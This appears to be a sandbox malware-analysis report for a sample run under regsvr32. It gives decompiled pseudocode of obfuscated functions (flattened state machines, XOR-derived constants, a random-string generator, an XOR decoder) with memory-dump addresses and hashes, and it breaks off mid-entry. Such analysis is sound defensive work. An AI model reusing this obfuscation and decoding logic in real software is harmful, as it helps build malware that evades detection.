					 *(_t156 + 0x28) = 0x1ff7b1;
					 *(_t156 + 0x28) =  *(_t156 + 0x28) * 0x34;
					 *(_t156 + 0x28) =  *(_t156 + 0x28) * 0x7a;
					 *(_t156 + 0x28) =  *(_t156 + 0x28) >> 0xe;
					 *(_t156 + 0x28) =  *(_t156 + 0x28) ^ 0x000060c9;
					if(_t149 >  *(_t156 + 0x28)) {
						 *_t151 = _t141;
						_t151 =  &(_t151[0]);
					}
					 *(_t156 + 0x28) = 0x3a7a22;
					 *(_t156 + 0x28) =  *(_t156 + 0x28) + 0xffff9e72;
					_t132 = 0x71;
					 *(_t156 + 0x2c) =  *(_t156 + 0x28) / _t132;
					_t133 = 0x6b;
					 *(_t156 + 0x28) =  *(_t156 + 0x2c) / _t133;
					 *(_t156 + 0x28) =  *(_t156 + 0x28) ^ 0x00000138;
					_t104 =  *(_t156 + 0x28);
					if(_t149 > _t104) {
						 *_t151 = _t124 >> 8;
						return _t104;
					}
				}
				return _t104;
			}

0x003cea91
0x003cea96
0x003cea97
0x003cea9b
0x003cea9d
0x003cea9f
0x003ceaa4
0x003ceaab
0x003ceab2
0x003ceaba
0x003ceabd
0x003ceac5
0x003ceacd
0x003cead5
0x003ceadd
0x003ceae5
0x003ceaf3
0x003ceaf7
0x003ceafa
0x003ceafc
0x003ceafc
0x003ceb0c
0x003ceb0f
0x003ceb13
0x003ceb1b
0x003ceb28
0x003ceb2c
0x003ceb41
0x003ceb43
0x003ceb46
0x003ceb46
0x003ceb49
0x003ceb4a
0x003ceb52
0x003ceb5a
0x003ceb5f
0x003ceb67
0x003ceb73
0x003ceb76
0x003ceb78
0x003ceb7e
0x003ceb8f
0x003ceb90
0x003ceb94
0x003ceb99
0x003ceba1
0x003ceba9
0x003cebae
0x003cebb9
0x003cebbd
0x003cebd2
0x003cebd6
0x003cebde
0x003cebe0
0x003cebe1
0x003cebee
0x003cebf7
0x003cebfb
0x003cec00
0x003cec0e
0x003cec10
0x003cec12
0x003cec12
0x003cec13
0x003cec1d
0x003cec2b
0x003cec30
0x003cec3a
0x003cec3d
0x003cec41
0x003cec49
0x003cec4f
0x003cec54
0x00000000
0x003cec54
0x003cec4f
0x003cec5c

Strings

"z:, xrefs: 003CEC13

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "z:
API String ID: 0-3612607314
Opcode ID: 1c04cbd59645723298c21f1704d7f4036aaab6b42830a3d118c3f98fa3682950
Instruction ID: 90328ff216676f90a61ca927c1412ca9429f74c409ccab025e9f754ec6306e3c
Opcode Fuzzy Hash: 1c04cbd59645723298c21f1704d7f4036aaab6b42830a3d118c3f98fa3682950
Instruction Fuzzy Hash: 5E51EA715083019FD315DF29C48951BBFE1EBD83A8F188A1DF099A7260D7B4DA85CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 003D44A7 Relevance: 1.4, Strings: 1, Instructions: 119
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003D44A7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t93;
				void* _t95;
				void* _t104;
				void* _t105;
				signed int _t108;
				intOrPtr _t120;
				signed int* _t123;

				_push(_a16);
				_t119 = _a8;
				_t105 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t93);
				_t123 =  &(( &_v76)[6]);
				_v60 = 0xb28e4;
				_t120 = 0;
				_t95 = 0x3a49a;
				_v56 = 0;
				while(_t95 != 0x399c2) {
					if(_t95 == 0x3a49a) {
						_t95 = 0x399c2;
						continue;
					} else {
						if(_t95 == 0xa5016) {
							_v68 = 0x27adb7;
							_t108 = 0x24;
							_v68 = _v68 / _t108;
							_v68 = _v68 ^ 0x00025dfb;
							_v72 = 0xb18a40;
							_v72 = _v72 + 0xffff791e;
							_v72 = _v72 + 0xfffffc97;
							_v72 = _v72 ^ 0x00b22a0b;
							_v64 = 0xe5c800;
							_v64 = _v64 ^ 0x34aa911d;
							_v64 = _v64 ^ 0x3449a0e4;
							_v76 = 0xbe19fa;
							_v76 = _v76 << 9;
							_v76 = _v76 + 0xffff5f81;
							_v76 = _v76 | 0xab0926dc;
							_v76 = _v76 ^ 0xff3cf837;
							__eflags = E003D833B(_v68, _v72, __eflags, _v64, _v76,  &_v52, _t119 + 4);
							_t120 =  !=  ? 1 : _t120;
						} else {
							if(_t95 != 0xafc42) {
								L9:
								__eflags = _t95 - 0xce9d9;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_v72 = 0xbcae0b;
								_v72 = _v72 + 0xbf92;
								_v72 = _v72 + 0xf9e1;
								_v72 = _v72 ^ 0x00b70486;
								_v76 = 0x3d6022;
								_v76 = _v76 << 0xf;
								_v76 = _v76 | 0x3edd9ba1;
								_v76 = _v76 ^ 0xbedcd8ee;
								_v68 = 0x5a4b2e;
								_v68 = _v68 + 0xf10f;
								_v68 = _v68 ^ 0x0051941b;
								_t104 = E003CD706(_v72, _v76, _v68,  &_v52, _t119);
								_t123 =  &(_t123[3]);
								if(_t104 != 0) {
									_t95 = 0xa5016;
									continue;
								}
							}
						}
					}
					return _t120;
				}
				_v64 = 0x9eacb1;
				_v64 = _v64 + 0xe6c4;
				_v64 = _v64 ^ 0x009f6820;
				_v76 = 0x9993ea;
				_v76 = _v76 + 0xffffe685;
				_v76 = _v76 | 0x9d3b3a0b;
				_v76 = _v76 ^ 0x9db21d43;
				_v68 = 0x99051c;
				_v68 = _v68 + 0xffff0f4a;
				_v68 = _v68 ^ 0x009ce314;
				_v72 = 0x90568d;
				_v72 = _v72 | 0xcff7f76d;
				_t51 =  &_v72;
				 *_t51 = _v72 ^ 0xcff193b7;
				__eflags =  *_t51;
				E003CAE19( &_v52, _v64, _t105, _v76, _v68, _v72);
				_t123 =  &(_t123[4]);
				_t95 = 0xafc42;
				goto L9;
			}

0x003d44ae
0x003d44b2
0x003d44b6
0x003d44b8
0x003d44bc
0x003d44bd
0x003d44c1
0x003d44c2
0x003d44c3
0x003d44c8
0x003d44cb
0x003d44d3
0x003d44d5
0x003d44da
0x003d44e3
0x003d44f0
0x003d458d
0x00000000
0x003d44f6
0x003d44fb
0x003d462e
0x003d463e
0x003d4641
0x003d4648
0x003d4650
0x003d4658
0x003d4660
0x003d4668
0x003d4670
0x003d4678
0x003d4680
0x003d4688
0x003d4690
0x003d4695
0x003d469d
0x003d46a5
0x003d46ce
0x003d46d0
0x003d4501
0x003d4506
0x003d461e
0x003d461e
0x003d4623
0x00000000
0x00000000
0x003d4629
0x003d450c
0x003d450c
0x003d4518
0x003d4520
0x003d4528
0x003d4530
0x003d4538
0x003d453d
0x003d4545
0x003d454d
0x003d4555
0x003d455d
0x003d4573
0x003d4578
0x003d457d
0x003d4583
0x00000000
0x003d4583
0x003d457d
0x003d4506
0x003d44fb
0x003d46dc
0x003d46dc
0x003d4594
0x003d45a0
0x003d45a8
0x003d45b0
0x003d45b8
0x003d45c0
0x003d45c8
0x003d45d0
0x003d45d8
0x003d45e0
0x003d45e8
0x003d45f0
0x003d45f8
0x003d45f8
0x003d45f8
0x003d4611
0x003d4616
0x003d4619
0x00000000

Strings

.KZ, xrefs: 003D454D

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .KZ
API String ID: 0-1436654812
Opcode ID: 914afe4418ff1492d2247b29ea6ea937fd5d28aab794fdcf6d3e8c838f48e0d8
Instruction ID: 9e956d2d640570e976fe9a934a85bf2378fb82bd1354f80afaa4d6d773570b0a
Opcode Fuzzy Hash: 914afe4418ff1492d2247b29ea6ea937fd5d28aab794fdcf6d3e8c838f48e0d8
Instruction Fuzzy Hash: 8A5140725083429FC365CF24E84981BBAE4FBD4358F100E2EF496A6261D3B0CA59DBD3

Uniqueness

Uniqueness Score: -1.00%

Function 003DAFB1 Relevance: 1.4, Strings: 1, Instructions: 119
COMMONCrypto

Download Yara Rule

C-Code - Quality: 48%

			E003DAFB1() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t99;
				intOrPtr _t109;
				intOrPtr _t112;
				signed int _t114;
				void* _t117;
				void* _t122;

				_t114 =  *0x3e2224; // 0x0
				_v24 = 0x6680;
				_t99 = 0x2add;
				_v20 = 0x5036d;
				do {
					while(_t99 != 0x2add) {
						if(_t99 == 0x64ecf) {
							_v8 = 0x397e42;
							_v8 = _v8 ^ 0xfaf1618c;
							_v8 = _v8 | 0x6f033e8e;
							_v8 = _v8 + 0xffff5812;
							_v8 = _v8 ^ 0xffc55ad2;
							_v20 = 0x5d73b6;
							_v20 = _v20 + 0xfffff049;
							_v20 = _v20 ^ 0x00531fa0;
							_v16 = 0xe0c812;
							_v16 = _v16 | 0x68f3b210;
							_v16 = _v16 ^ 0x4f1314a5;
							_v16 = _v16 ^ 0x27e5e0ca;
							_v12 = 0x4642c0;
							_v12 = _v12 ^ 0xf97e7192;
							_v12 = _v12 + 0xffff16b6;
							_v12 = _v12 + 0xc90a;
							_t90 =  &_v12;
							 *_t90 = _v12 ^ 0xf93a6825;
							__eflags =  *_t90;
							_push(_v12);
							_push(_v16);
							_push(_v20);
							_push(_v8);
							_push(0);
							_t109 = E003CE7C3(_t114, E003CB7B5);
							_t114 =  *0x3e2224; // 0x0
							 *((intOrPtr*)(_t114 + 8)) = _t109;
						} else {
							if(_t99 != 0x9e6f4) {
								goto L6;
							} else {
								_v8 = 0xf3c5ee;
								_v8 = _v8 * 0x48;
								_v8 = _v8 * 0x52;
								_v8 = _v8 >> 0xe;
								_v8 = _v8 ^ 0x000149ce;
								_v16 = 0x89d7cd;
								_v16 = _v16 ^ 0x7bd40e2d;
								_v16 = _v16 ^ 0xa2885bbc;
								_v16 = _v16 ^ 0xd9dc0f81;
								_v12 = 0x398c62;
								_v12 = _v12 + 0xffff7bd3;
								_v12 = _v12 | 0x37d580b1;
								_v12 = _v12 ^ 0x37f50b5e;
								_v20 = 0xeead7b;
								_v20 = _v20 + 0xffffbb70;
								_v20 = _v20 ^ 0x00ea698b;
								_t112 = E003C4266(_t114, _v8, _t114, _v16, _t114, _v12, _t114, _v20);
								_t114 =  *0x3e2224; // 0x0
								_t122 = _t122 + 0x18;
								 *((intOrPtr*)(_t114 + 0x1c)) = _t112;
								_t99 = 0x64ecf;
								continue;
							}
						}
						L9:
						__eflags = _t114;
						_t98 = _t114 != 0;
						__eflags = _t98;
						return 0 | _t98;
					}
					_v12 = 0x83e8c0;
					_push(_t114);
					_push(_t114);
					_t117 = 0x30;
					_v12 = _v12 * 0x55;
					_v12 = _v12 * 0x72;
					_v12 = _v12 * 0x1a;
					_v12 = _v12 ^ 0x192c94a0;
					_v8 = 0xa6ac0d;
					_v8 = _v8 ^ 0xfd310608;
					_v8 = _v8 << 5;
					_v8 = _v8 >> 1;
					_v8 = _v8 ^ 0x5970091d;
					_v20 = 0x2f26a1;
					_v20 = _v20 ^ 0x4679fa50;
					_t57 =  &_v20;
					 *_t57 = _v20 ^ 0x4651bab1;
					__eflags =  *_t57;
					_t114 = E003C8D52(_t114, _t117,  *_t57);
					_t99 = 0x9e6f4;
					 *0x3e2224 = _t114;
					L6:
					__eflags = _t99 - 0x1203f;
				} while (_t99 != 0x1203f);
				goto L9;
			}

0x003dafb7
0x003dafc4
0x003dafcc
0x003dafce
0x003dafdf
0x003dafdf
0x003dafe9
0x003db10e
0x003db11a
0x003db121
0x003db128
0x003db12f
0x003db136
0x003db13d
0x003db144
0x003db14b
0x003db152
0x003db159
0x003db160
0x003db167
0x003db16e
0x003db175
0x003db17c
0x003db183
0x003db183
0x003db183
0x003db18a
0x003db18d
0x003db193
0x003db196
0x003db199
0x003db19b
0x003db1a0
0x003db1a9
0x003dafef
0x003daff1
0x00000000
0x003daff7
0x003daff7
0x003db002
0x003db009
0x003db00c
0x003db010
0x003db017
0x003db01e
0x003db025
0x003db02c
0x003db033
0x003db03a
0x003db041
0x003db048
0x003db04f
0x003db056
0x003db05d
0x003db073
0x003db078
0x003db07e
0x003db081
0x003db084
0x00000000
0x003db084
0x003daff1
0x003db1ac
0x003db1ae
0x003db1b2
0x003db1b2
0x003db1b9
0x003db1b9
0x003db08b
0x003db096
0x003db097
0x003db09a
0x003db09b
0x003db0a2
0x003db0a9
0x003db0ac
0x003db0b3
0x003db0ba
0x003db0c1
0x003db0c5
0x003db0c8
0x003db0cf
0x003db0d6
0x003db0dd
0x003db0dd
0x003db0dd
0x003db0f4
0x003db0f6
0x003db0f8
0x003db0fe
0x003db0fe
0x003db0fe
0x00000000

Strings

B~9, xrefs: 003DB10E

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: B~9
API String ID: 0-1659264204
Opcode ID: febee3a74465a0aeeabea793d281481911b1d75e56d5c249b78ff74339a63868
Instruction ID: 985374da7411e7b72cbdb511a0df76c75ca47221bed84368ad9a3b975e3a855d
Opcode Fuzzy Hash: febee3a74465a0aeeabea793d281481911b1d75e56d5c249b78ff74339a63868
Instruction Fuzzy Hash: EA512372D01219EFCF59CFA5DA8649EFBB4FB44304F20859DD112AA260E3B15B449F40

Uniqueness

Uniqueness Score: -1.00%

Function 003CBF6E Relevance: 1.4, Strings: 1, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003CBF6E(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				unsigned int _v24;
				void* __edx;
				void* _t68;
				void* _t70;
				void* _t71;
				signed int _t73;
				intOrPtr* _t84;
				void* _t89;
				intOrPtr _t91;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003C2528(_t68);
				_v8 = 0x54b8a;
				_t91 = 0;
				_t70 = 0xf2598;
				_v4 = 0;
				do {
					while(_t70 != 0x32674) {
						if(_t70 == 0x7b9a7) {
							_t84 = _a8;
							_t73 = E003D0F87(_t84);
							asm("sbb eax, eax");
							_t70 = ( ~_t73 & 0xfff95e72) + 0x9c802;
							continue;
						} else {
							if(_t70 == 0x8f5b0) {
								E003C9B4C(__eflags);
								_t70 = 0x9c802;
								continue;
							} else {
								if(_t70 == 0x9c802) {
									_v12 = 0x734b48;
									_v12 = _v12 << 2;
									_v12 = _v12 | 0xb906f1d4;
									_v12 = _v12 ^ 0xb9c49835;
									_v20 = 0xd01a17;
									_v20 = _v20 + 0xffff1483;
									_v20 = _v20 ^ 0x2da3198d;
									_v20 = _v20 + 0x9a7c;
									_v20 = _v20 ^ 0x2d6d8b4b;
									_v16 = 0xbb6097;
									_v16 = _v16 << 7;
									_v16 = _v16 + 0x160d;
									_v16 = _v16 ^ 0x5dbece84;
									_v24 = 0xab1129;
									_v24 = _v24 | 0x534ee785;
									_v24 = _v24 << 0xd;
									_v24 = _v24 >> 5;
									_v24 = _v24 ^ 0x07ffef8c;
									E003C79D0(_v12, _v20, __eflags, _v16,  *0x3e221c, _v24);
								} else {
									_t102 = _t70 - 0xf2598;
									if(_t70 != 0xf2598) {
										goto L11;
									} else {
										_v12 = 0x2e7cd9;
										_v12 = _v12 << 9;
										_v12 = _v12 ^ 0x5cf50e36;
										_v24 = 0xa74744;
										_v24 = _v24 | 0x76a37b5f;
										_v24 = _v24 >> 0xb;
										_v24 = _v24 >> 4;
										_v24 = _v24 ^ 0x0004eb0e;
										_v20 = 0x2fb5fe;
										_v20 = _v20 >> 4;
										_v20 = _v20 + 0xffff63c9;
										_v20 = _v20 ^ 0x0006bb4a;
										_push(_t84);
										_t89 = 0x6c;
										 *0x3e221c = E003C8D52(_t84, _t89, _t102);
										_t70 = 0x7b9a7;
										_t84 = _t84;
										continue;
									}
								}
							}
						}
						L15:
						return _t91;
					}
					_t84 = _a12;
					_t71 = E003D609A(_t84);
					__eflags = _t71;
					if(_t71 != 0) {
						_t91 = 1;
						__eflags = 1;
					} else {
						_t70 = 0x8f5b0;
						goto L11;
					}
					goto L15;
					L11:
					__eflags = _t70 - 0xc3c05;
				} while (__eflags != 0);
				goto L15;
			}

0x003cbf75
0x003cbf79
0x003cbf7d
0x003cbf82
0x003cbf83
0x003cbf8b
0x003cbf93
0x003cbf95
0x003cbf9a
0x003cbfad
0x003cbfad
0x003cbfba
0x003cc05f
0x003cc063
0x003cc06a
0x003cc071
0x00000000
0x003cbfc0
0x003cbfc2
0x003cc053
0x003cc058
0x00000000
0x003cbfc8
0x003cbfca
0x003cc09b
0x003cc0a3
0x003cc0a8
0x003cc0b0
0x003cc0b8
0x003cc0c0
0x003cc0c8
0x003cc0d0
0x003cc0d8
0x003cc0e0
0x003cc0e8
0x003cc0ed
0x003cc0f5
0x003cc0fd
0x003cc105
0x003cc10d
0x003cc112
0x003cc117
0x003cc135
0x003cbfd0
0x003cbfd0
0x003cbfd5
0x00000000
0x003cbfdb
0x003cbfdb
0x003cbfe3
0x003cbfe8
0x003cbff0
0x003cbff8
0x003cc000
0x003cc005
0x003cc00a
0x003cc012
0x003cc01a
0x003cc01f
0x003cc027
0x003cc03b
0x003cc03f
0x003cc046
0x003cc04b
0x003cc04d
0x00000000
0x003cc04d
0x003cbfd5
0x003cbfca
0x003cbfc2
0x003cc143
0x003cc14b
0x003cc14b
0x003cc078
0x003cc07c
0x003cc081
0x003cc083
0x003cc141
0x003cc141
0x003cc089
0x003cc089
0x00000000
0x003cc089
0x00000000
0x003cc08b
0x003cc08b
0x003cc08b
0x00000000

Strings

HKs, xrefs: 003CC09B

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: HKs
API String ID: 0-1531556642
Opcode ID: 4fb7138e6c566e1c935052b02007121672269ee4d35c9062d28f2f13b0953ecf
Instruction ID: 6f4140ab6f8c0f6ddcd1da6a461384e19bdce21a4390261c9acc4adbdd94e804
Opcode Fuzzy Hash: 4fb7138e6c566e1c935052b02007121672269ee4d35c9062d28f2f13b0953ecf
Instruction Fuzzy Hash: 174146B21183528BC716DF24D84A91BFAE4FB94B18F104E2CF196D6211C3B4CA09CB93

Uniqueness

Uniqueness Score: -1.00%

Function 003CAF67 Relevance: 1.4, Strings: 1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E003CAF67(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t91;
				signed int _t99;
				short _t106;
				short _t107;
				short _t108;
				signed int _t109;
				signed int _t111;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				intOrPtr _t120;
				signed int* _t122;

				_t109 = _a12;
				_t120 = _a4;
				_push(_a20);
				_t117 = __edx;
				_push(_a16);
				_v132 = __edx;
				_push(_t109);
				_push(_a8);
				_push(_t120);
				_push(__edx);
				E003C2528(_t91);
				_v136 = 0xe3392;
				_t122 =  &(( &_v140)[7]);
				_v140 = 0x3c6960;
				_t119 = 0;
				_v140 = _v140 << 3;
				_v140 = _v140 ^ 0xa04b5811;
				_v140 = _v140 ^ 0xa1a81310;
				if((__edx & _v140) != 0) {
					_t108 = 0x61;
					do {
						 *((short*)(_t122 + 0x1c + _t119 * 2)) = _t108;
						_t119 = _t119 + 1;
						_t108 = _t108 + 1;
					} while (_t108 <= 0x7a);
				}
				_v140 = 0xe4264c;
				_t22 =  &_v140; // 0xe4264c
				_t111 = 0x2f;
				_v140 =  *_t22 / _t111;
				_v140 = _v140 << 6;
				_v140 = _v140 + 0x4bf0;
				_v140 = _v140 ^ 0x0136f7b2;
				if((_t117 & _v140) != 0) {
					_t107 = 0x41;
					do {
						 *((short*)(_t122 + 0x1c + _t119 * 2)) = _t107;
						_t119 = _t119 + 1;
						_t107 = _t107 + 1;
					} while (_t107 <= 0x5a);
				}
				_v136 = 0x155561;
				_v136 = _v136 + 0x7bbe;
				_v136 = _v136 ^ 0x0015d11b;
				if((_t117 & _v136) != 0) {
					_t106 = 0x30;
					do {
						 *((short*)(_t122 + 0x1c + _t119 * 2)) = _t106;
						_t119 = _t119 + 1;
						_t106 = _t106 + 1;
					} while (_t106 <= 0x39);
				}
				if(_t109 != 0) {
					_t118 = 0;
					do {
						_v136 = 0x4f7c14;
						_v136 = _v136 << 0xe;
						_v136 = _v136 << 0xd;
						_v136 = _v136 ^ 0xa000ffdd;
						_v140 = 0xe642ab;
						_v140 = _v140 + 0xffffdcba;
						_v140 = _v140 + 0xffff9cfb;
						_v140 = _v140 ^ 0x00ed9354;
						 *((short*)(_t120 + _t118 * 2)) =  *((intOrPtr*)(_t122 + 0x1c + E003C56B4() % _t119 * 2));
						_t118 = _t118 + 1;
					} while (_t118 < _t109);
					_t117 = _v132;
				}
				_v140 = 0x63859e;
				_v140 = _v140 + 0xffff9ab0;
				_v140 = _v140 * 9;
				_v140 = _v140 + 0x8094;
				_v140 = _v140 ^ 0x037ca35a;
				_t99 = _v140;
				if((_t117 & _t99) != 0) {
					 *((short*)(_t120 + _t109 * 2)) = 0;
					return 0;
				}
				return _t99;
			}

0x003caf6e
0x003caf76
0x003caf7f
0x003caf86
0x003caf88
0x003caf8f
0x003caf93
0x003caf94
0x003caf9b
0x003caf9c
0x003caf9e
0x003cafa3
0x003cafab
0x003cafae
0x003cafb6
0x003cafb8
0x003cafbd
0x003cafc5
0x003cafd3
0x003cafd7
0x003cafd8
0x003cafd8
0x003cafdd
0x003cafde
0x003cafdf
0x003cafd8
0x003cafe5
0x003cafef
0x003caff5
0x003caff8
0x003caffc
0x003cb001
0x003cb009
0x003cb017
0x003cb01b
0x003cb01c
0x003cb01c
0x003cb021
0x003cb022
0x003cb023
0x003cb01c
0x003cb029
0x003cb031
0x003cb039
0x003cb047
0x003cb04b
0x003cb04c
0x003cb04c
0x003cb051
0x003cb052
0x003cb053
0x003cb04c
0x003cb05b
0x003cb05d
0x003cb05f
0x003cb05f
0x003cb067
0x003cb06c
0x003cb071
0x003cb079
0x003cb081
0x003cb089
0x003cb091
0x003cb0af
0x003cb0b4
0x003cb0b5
0x003cb0b9
0x003cb0b9
0x003cb0bd
0x003cb0c5
0x003cb0d2
0x003cb0d6
0x003cb0de
0x003cb0e6
0x003cb0ec
0x003cb0f0
0x00000000
0x003cb0f0
0x003cb0ff

Strings

L&, xrefs: 003CAFEF

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: L&
API String ID: 0-2857064556
Opcode ID: b03baab86576ff694e3a36ad9191ceadc0da8c4f19e5eda131133e0e304422e6
Instruction ID: 54d7e2b0d04b791151d5cab70bf0c67b5c739b6ece60fa9664da6ea0a01800e3
Opcode Fuzzy Hash: b03baab86576ff694e3a36ad9191ceadc0da8c4f19e5eda131133e0e304422e6
Instruction Fuzzy Hash: D04142765083828BC361EE24D849A1BBBE1FFC4744F004E2DF5A596250D7B0CA0A8BA3

Uniqueness

Uniqueness Score: -1.00%

Function 003DF571 Relevance: 1.3, Strings: 1, Instructions: 98
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E003DF571(signed int* __ecx, signed int* __edx) {
				void* _t54;
				signed int _t56;
				signed int _t58;
				signed int _t65;
				signed int _t69;
				signed int _t71;
				void* _t76;
				void* _t85;
				signed int* _t86;
				signed int* _t87;
				unsigned int _t88;
				signed int _t91;
				signed int* _t96;
				void* _t97;
				void* _t98;
				void* _t99;

				_push( *((intOrPtr*)(_t98 + 0x38)));
				_t96 = __edx;
				_push( *((intOrPtr*)(_t98 + 0x38)));
				 *((intOrPtr*)(_t98 + 0x28)) = __edx;
				_push(__edx);
				_push(__ecx);
				E003C2528(_t54);
				_t56 =  *__ecx;
				_t86 =  &(__ecx[1]);
				 *(_t98 + 0x3c) =  *(_t98 + 0x3c) & 0x00000000;
				_t99 = _t98 + 0x10;
				_t87 =  &(_t86[1]);
				 *((intOrPtr*)(_t99 + 0x24)) = 0xfa3d3;
				_t69 =  *_t86 ^ _t56;
				 *((intOrPtr*)(_t99 + 0x28)) = 0xf328;
				 *(_t99 + 0x10) = 0x30e68a;
				 *(_t99 + 0x10) =  *(_t99 + 0x10) | 0x2e68c038;
				 *(_t99 + 0x10) =  *(_t99 + 0x10) ^ 0x2e78e6be;
				 *(_t99 + 0x1c) = _t56;
				_t58 =  *(_t99 + 0x10) - 1;
				_t100 = _t69 & _t58;
				if((_t69 & _t58) == 0) {
					_t88 = _t69;
				} else {
					_t88 = ( !( *(_t99 + 0x10) - 1) & _t69) +  *(_t99 + 0x10);
				}
				 *(_t99 + 0x10) = 0xc2314d;
				 *(_t99 + 0x10) =  *(_t99 + 0x10) >> 6;
				 *(_t99 + 0x10) =  *(_t99 + 0x10) + 0xab45;
				 *(_t99 + 0x10) =  *(_t99 + 0x10) + 0x7540;
				 *(_t99 + 0x10) =  *(_t99 + 0x10) ^ 0x000c581f;
				 *(_t99 + 0x18) = 0xe802ba;
				_t71 = 0x4c;
				_push(_t71);
				 *(_t99 + 0x1c) =  *(_t99 + 0x18) / _t71;
				 *(_t99 + 0x1c) =  *(_t99 + 0x1c) ^ 0x0008677c;
				 *(_t99 + 0x18) = 0xda41bc;
				_push(_t71);
				 *(_t99 + 0x1c) =  *(_t99 + 0x18) * 0x4b;
				 *(_t99 + 0x1c) =  *(_t99 + 0x1c) ^ 0x3ffe9165;
				_t65 = E003C8D52(_t71, _t88, _t100);
				 *(_t99 + 0x20) = _t65;
				if(_t65 != 0) {
					_t85 =  >  ? 0 :  &(_t87[_t88 >> 2]) - _t87 + 3 >> 2;
					if(_t85 != 0) {
						_t91 =  *(_t99 + 0x1c);
						_t76 = _t65 - _t87;
						_t97 = 0;
						do {
							_t97 = _t97 + 1;
							 *(_t76 + _t87) =  *_t87 ^ _t91;
							_t87 =  &(_t87[1]);
						} while (_t97 < _t85);
						_t96 =  *(_t99 + 0x20);
						_t65 =  *(_t99 + 0x18);
					}
					if(_t96 != 0) {
						 *_t96 = _t69;
						return _t65;
					}
				}
				return _t65;
			}

0x003df578
0x003df57c
0x003df57e
0x003df582
0x003df586
0x003df587
0x003df588
0x003df58d
0x003df58f
0x003df592
0x003df597
0x003df59c
0x003df59f
0x003df5a7
0x003df5a9
0x003df5b1
0x003df5b9
0x003df5c1
0x003df5c9
0x003df5d1
0x003df5d2
0x003df5d4
0x003df5e5
0x003df5d6
0x003df5df
0x003df5df
0x003df5e7
0x003df5f1
0x003df5f6
0x003df5fe
0x003df606
0x003df60e
0x003df61c
0x003df61f
0x003df620
0x003df626
0x003df62e
0x003df63b
0x003df63c
0x003df640
0x003df654
0x003df659
0x003df661
0x003df677
0x003df67c
0x003df67e
0x003df684
0x003df686
0x003df688
0x003df68c
0x003df68d
0x003df690
0x003df693
0x003df697
0x003df69b
0x003df69b
0x003df6a1
0x003df6a3
0x00000000
0x003df6a3
0x003df6a1
0x003df6ad

Strings

@u, xrefs: 003DF5FE

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @u
API String ID: 0-2446317641
Opcode ID: dce44414a9fd22c85f69efb8f3c3662591a5d7bd55860f51b7a4ba16f9119897
